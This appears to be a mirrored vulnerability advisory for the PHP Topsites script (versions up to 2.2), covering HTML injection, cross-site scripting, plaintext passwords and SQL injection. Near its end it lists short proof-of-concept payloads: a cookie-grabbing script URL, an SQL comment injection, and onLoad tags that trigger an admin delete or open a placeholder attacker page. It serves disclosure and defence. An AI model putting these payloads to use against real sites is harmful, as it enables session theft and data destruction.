PHP Topsites < 2.2 - Multiple Vulnerabilities

PHP Topsites < 2.2 – Multiple Vulnerabilities

漏洞ID 1053686 漏洞类型
发布时间 2003-01-13 更新时间 2003-01-13
图片[1]-PHP Topsites < 2.2 - Multiple Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-PHP Topsites < 2.2 - Multiple Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43437
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
PHP Topsites Multiple Vulnerabilities

Vendor: iTop 10
Product: PHP Topsites
Version: <= 2.2
Website: http://www.itop10.net/

BID: 6621 6622 6623 6625 

Description:
PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more. 

Script Injection Vulnerability:
An HTML injection vulnerability has been discovered in PHP TopSites. The issue occurs due to insufficient sanitization of user-supplied data. By injecting HTML code into the <body> tag of the description page, when submitting website, it may be possible to cause an administrator to edit or delete database entries. This issue will occur when an unsuspecting administrator loads the submitted description. This vulnerability also affects the 'edit.php' script. 

Cross Site Scripting Vulnerability:
A vulnerability has been discovered in PHP TopSites. Due to invalid sanitization of user-supplied input by the 'help.php' script, it may be possible for an attacker to steal another users cookie information or other sensitive data. This issue can be exploited by constructing a malicious URL containing embedded script code as a 'help.php' parameter. When an unsuspecting user follows the link sensitive information, such as cookie-based authentication credentials may be obtained by the attacker. 

Plaintext Password Weakness:
A weakness has been discovered in PHP TopSites. It has been reported that user's passwords are stored in plaintext and thus are visible to TopSites administrators. This poses a security risk as TopSite script users may use the same passwords on other systems. 

SQL Injection Vulnerability:
A vulnerability has been discovered in PHP TopSites. Due to insufficient sanitization of user-supplied URI parameters it is possible for an attacker to embed SQL commands into certain page requests. This may result in database information being disclose to an attacker. 

Solution:
Upgrade to the current version of php topsites 

Proof Of Conecpt Exploit:
iTop10.net phpTopsites Proof Of Concept 

Credits:
James Bercegay of the GulfTech Security Research Team. And The CyberArmy ACAT Team.





- https://www.securityfocus.com/bid/6625/info
http://examplewebsite.com/topsitesdirectory/edit.php?a=pre&submit=&sid=siteidnumber--

- https://www.securityfocus.com/bid/6623/info

- https://www.securityfocus.com/bid/6622/info
http://www.example.com/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>

- https://www.securityfocus.com/bid/6621/info
<body onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/seditor.php?sid=siteidnumber&a=delete'">
<body onLoad="window.open('http://attackerswebsite/launcher.htm')">

相关推荐: ghttpd Log() Function Buffer Overflow Vulnerability

ghttpd Log() Function Buffer Overflow Vulnerability 漏洞ID 1101425 漏洞类型 Boundary Condition Error 发布时间 2002-10-15 更新时间 2002-10-15 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享